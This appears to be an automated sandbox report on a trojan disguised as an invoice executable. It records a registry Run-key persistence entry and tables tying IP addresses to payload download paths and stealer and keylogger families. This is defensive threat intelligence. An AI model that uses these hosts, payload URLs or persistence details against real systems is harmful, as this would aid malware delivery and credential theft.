Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: invoices---DEC_2023.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/4@0/2
EGA Information:
• Successful, ratio: 16.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target fikk.exe, PID 1976 because it is empty
• Execution Graph export aborted for target fikk.exe, PID 3372 because it is empty
• Execution Graph export aborted for target fikk.exe, PID 4448 because it is empty
• Execution Graph export aborted for target invoices---DEC_2023.exe, PID 2148 because it is empty
• Execution Graph export aborted for target invoices---DEC_2023.exe, PID 748 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:12:56 | API Interceptor | 1x Sleep call for process: invoices---DEC_2023.exe modified
09:12:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fikk C:\Users\user\AppData\Roaming\fikk.exe
09:13:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fikk C:\Users\user\AppData\Roaming\fikk.exe
09:13:12 | API Interceptor | 1x Sleep call for process: fikk.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.137.22.163 | Sysiq.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163/Sluhmuv.mp3
 | NEW_ORDER_12-18-23.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163/Akoob.pdf
 | SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163/hiii.pdf
 | Controllo saldo 30% Ordine 5667.exe | malicious | AgentTesla | 45.137.22.163/bless_Jkvszuhw.png
 | Quotation-pdf______________________________________.exe | malicious | AgentTesla | 45.137.22.163/Toscgshw_Yvmodcuo.png
 | 주문 30% 잔액 확인.exe | malicious | Snake Keylogger | 45.137.22.163/orderfile_Hecqxfqw.png
 | New order _xls.exe | malicious | Snake Keylogger | 45.137.22.163/New_order__xls_Ivuuoipf.bmp
 | SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe | malicious | Snake Keylogger | 45.137.22.163/fact_Sptqaevl.bmp
 | order confirmation 46574 -QT-04-0022.exe | malicious | Snake Keylogger | 45.137.22.163/order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg
 | Quotation-pdf______________________________________.exe | malicious | AgentTesla | 45.137.22.163/Kwcmalox_Bcqlnfnp.jpg
 | 2467864 _INV_pdf.exe | malicious | Snake Keylogger | 45.137.22.163/Hebvr_Lwvvdxxi.bmp
 | conferma d'ordine 46574.exe | malicious | Snake Keylogger | 45.137.22.163/fresh_Djctepjr.png
 | factura proforma PI- PI04522 7486.exe | malicious | Unknown | 45.137.22.163/trans_Yygygcyg.jpg
 | PI- PI04522 74868.exe | malicious | AgentTesla | 45.137.22.163/proforma_invoice_Crnbdlom.png
 | paymentcopy-pdf__________________________________.exe | malicious | AgentTesla | 45.137.22.163/Wmdmjhtr_Pendcahw.bmp
 | Paymentcopy-pdf___________________________________.exe | malicious | AgentTesla | 45.137.22.163/Dhjuzchby_Xwgoflwi.bmp
 | AIR CARGO BOARDING shipment MAWB 40608657504.exe | malicious | Snake Keylogger | 45.137.22.163/Ejghs_Imuzrnrb.png
 | PI- PI04522748-pdf.exe | malicious | Snake Keylogger | 45.137.22.163/Cpogmqp_Qhkfesil.jpg
 | Ordine di acquisto PO-JTT-00001018.exe | malicious | Snake Keylogger | 45.137.22.163/Htrcekszm_Kcdcxrzw.jpg
5.252.165.214 | rMSC-AQP-Newquotationrequest-ES0083ESP23.bat | malicious | Unknown | 
 | SecuriteInfo.com.Win64.TrojanX-gen.32623.1958.exe | malicious | PureLog Stealer | 
 | tDEOY2VfAj.exe | malicious | zgRAT | 
 | Qtagiietkyb.png.bat | malicious | Strela Stealer | 
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ROOTLAYERNETNL | Sysiq.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163
 | NEW_ORDER_12-18-23.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163
 | PAYMENT_TT_COPY.pdf.exe | malicious | RedLine | 185.222.58.239
 | SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe | malicious | AgentTesla, PureLog Stealer | 45.137.22.163
 | cVw2fI6l0l.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader | 45.137.21.8
 | D4CJJrRyRV.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig | 45.137.21.8
 | C2qEwpO6ff.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, PureLog Stealer, RedLine, SmokeLoader, Xmrig | 45.137.21.8
 | rQ7KS66xHz.exe | malicious | Glupteba, PureLog Stealer, RedLine, SmokeLoader, Xmrig | 45.137.21.8
 | cgROS79PO8.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig | 45.137.21.8
 | GQmlDdfIus.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig | 45.137.21.8
 | tFXV5OO73i.exe | malicious | Glupteba, PureLog Stealer, RedLine, SmokeLoader, Xmrig | 45.137.21.8
 | xR0Sb2wGy9.exe | malicious | RedLine | 185.222.58.99
 | rdU3cg9xmI.exe | malicious | Glupteba, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, Xmrig | 45.137.21.8
 | Dzc2otu6qd.exe | malicious | Glupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig | 45.137.21.8
 | YRdCIU1WYM.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader | 45.137.21.8
 | ae6r1Pwu4b.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig | 45.137.21.8
 | 8d6f8324030f8c1566ab38f8ade3c386b7b7740ccaf28.exe | malicious | PrivateLoader, RedLine, RisePro Stealer, SmokeLoader | 45.137.21.8